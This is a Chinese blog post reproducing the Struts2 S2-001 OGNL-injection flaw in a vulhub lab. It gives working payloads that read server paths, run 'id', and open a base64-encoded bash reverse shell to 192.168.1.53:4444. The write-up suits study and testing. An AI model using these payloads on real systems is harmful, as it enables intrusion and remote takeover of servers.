vulhub-struts2-S2-001 远程代码执行漏洞复现

最新推荐文章于 2023-07-12 14:23:36 发布
最新推荐文章于 2023-07-12 14:23:36 发布
阅读量187 收藏
点赞数
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/131273006
版权

漏洞原理

该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。

漏洞复现

打开vulhub的struts2目录

└─# docker-compose build         
└─# docker-compose up -d

访问8080端口

我们尝试在密码框里注入OGNL表达式

%{2*4}

返回结果8

 证明漏洞存在

尝试构造poc获取tomcat执行路径

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

得到路径

接着尝试获取web路径

%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
 

 执行id命令
 

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
 

 

 发现这些命令都能够正常执行之后,我们尝试写入反弹shell的命令
 

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNTMvNDQ0NCAwPiYx
 

%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"bash","-c","{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuNTMvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
 

反弹shell成功
 

 

 

 
 

 慢也好,步伐小也罢,是往前走就好
 


                

        

        

    




    

      

        

            

              
                
                  夜yesec
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
struts2 代码执行 (CVE-2018-11776)

				
			

			

				

					qq_32445755的博客
				

				

					03-08
					
					796
					
				

			

		

		

			
				
影响版本

Struts<= Struts 2.3.34, Struts 2.5.16

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞。路径为/struts2-showcase/
...

			
		

	



                

              
                



	

		

			

				
					
Struts2远程代码执行漏洞分析(S2-013)1

				
			

			

				

					08-08
				

			

		

		

			
				
Struts2远程代码执行漏洞分析(S2-013)1

			
		

	



                


  
              

                


	

		

			

				
					
Apache RocketMQ 远程命令执行漏洞(CVE-2023-33246)vulhub漏洞复现

				
			

			

				

					qq_53003652的博客
				

				

					07-12
					
					668
					
				

			

		

		

			
				
在其5.1.0版本及以前存在一处命令执行漏洞,攻击者通过向其更新配置相关的功能发送指令即可更新任意配置项,并通过配置项中存在的命令注入功能执行任意命令。在192.168.126.128开启nc启动监听,运行该poc。Apache RocketMQ是一个分布式消息平台。创建hacker文件成功。使用IDEA新建一个。

			
		

	





	

		

			

				
					
struts2 代码执行 (CVE-2020-17530)

				
			

			

				

					yxr520yj的博客
				

				

					09-27
					
					1081
					
				

			

		

		

			
				
struts在某些情况下可能存在OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行。OGNL表达式注入注入漏洞,如果开发人员使用了%{…}语法,进行强制的OGNL解析,某些特殊的TAG属性可能被双重解析,攻击者可以通过构造恶意的OGNL表达式来利用此漏洞,最终造成远程代码执行漏洞。#struts2代码执行漏洞

			
		

	



		

			
		



	

		

			

				
					
vulfocus——struts2代码执行(CVE-2016-3087)

				
			

			

				

					m0_62063669的博客
				

				

					09-11
					
					645
					
				

			

		

		

			
				
Struts 2.3.20 - Struts Struts 2.3.28 (除2.3.20.3及2.3.24.3)版本,使用REST插件情况下,若启用了Dynamic Method Invocation,可能导致通过恶意表达式在服务器端执行任意代码Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。2.有回显poc(命令执行)3.用工具来获取flag。

			
		

	





	

		

			

				
					
struts2代码执行漏洞

				
			

			

				

					weixin_30530939的博客
				

				

					01-09
					
					63
					
				

			

		

		

			
				
刚刚@乌云-漏洞报告平台公布的struts2代码执行漏洞,具体的漏洞说明地址 https://www.sec-consult.com/files/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt 还是热乎的,我大概白话一下。 这个漏洞的级别很高,都升级修补一下。 影响版本是2.3.1和2.3.1之前的版本 解决办法是升级...

			
		

	





	

		

			

				
					
Struts2 S2-029远程代码执行漏洞初探1

				
			

			

				

					08-08
				

			

		

		

			
				
Struts2 S2-029远程代码执行漏洞初探1

			
		

	





	

		

			

				
					
Struts2 s2-032远程代码执行分析1

				
			

			

				

					08-08
				

			

		

		

			
				
Struts2 s2-032远程代码执行分析1

			
		

	





	

		

			

				
					
网络安全之命令执行漏洞复现

				
			

			

				

					youmaob的博客
				

				

					06-23
					
					420
					
				

			

		

		

			
				
Webmin 是功能最强大的基于 Web 的 Unix 系统管理工具。管理员通过浏览器访问 Webmin 的各种管理功能并完成相应的管理动作。在版本 1.997 之前的 Webmin 中存在一个任意命令注入漏洞,触发该漏洞需登录 Webmin。

			
		

	





	

		

			

				
					
vulhub-struts2-S2-008 远程代码执行漏洞复现

				
			

			

				

					qq_56426046的博客
				

				

					06-19
					
					434
					
				

			

		

		

			
				
影响版本: 2.1.0 - 2.3.1。

			
		

	





	

		

			

				
					
vulhub靶场之struts s2-001

				
			

			

				

					weixin_63147729的博客
				

				

					03-13
					
					114
					
				

			

		

		

			
				
进入vulhub/struts2/s2-001

			
		

	





	

		

			

				
					
Apache Struts2远程代码执行漏洞(S2-001)复现

				
			

			

				

					m0_58606546的博客
				

				

					01-14
					
					2420
					
				

			

		

		

			
				
0x01 漏洞概述

1、漏洞名称

漏洞名称:Struts Remote Code Exploit
	漏洞编号:Struts2-001
漏洞类型:Remote Code Execution
2、漏洞原理

Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(

			
		

	





	

		

			

				
					
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009

				
			

			

				

					mole_exp的博客
				

				

					01-18
					
					1931
					
				

			

		

		

			
				
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference
关于<旧文系列>
<旧文系列>系列是笔者将以前发到其他地方的技

			
		

	





	

		

			

				
					
关于 Apache 常见安全漏洞 --vulhub靶场练习

				
			

			

				

					m0_60742333的博客
				

				

					03-23
					
					1466
					
				

			

		

		

			
				
攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。以下实验环境皆来自于vulhub实验靶场,如下图示例,下载好vulhub环境进入要测试的漏洞文件夹,使用docker-compose up -d 命令开启实验。7. 将请求方式修改成POST,然后在请求体写入echo,并将数据包放行即可,使用bash进行反弹shell。后缀进行解析,导致绕过一些服务器的安全策略。

			
		

	





	

		

			

				
					
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)

					
热门推荐

				
			

			

				

					Bossfrank的博客
				

				

					04-14
					
					2万+
					
				

			

		

		

			
				
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行

			
		

	





	

		

			

				
					
Struts2远程代码执行漏洞

				
			

			

				

					weixin_46801402的博客
				

				

					11-01
					
					501
					
				

			

		

		

			
				
Struts2远程代码执行漏洞

			
		

	





	

		

			

				
					
S2-052远程代码执行漏洞

					
最新发布

				
			

			

				

					07-27
				

			

		

		

			
				
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。  攻击者可以通过...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
夜yesec

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值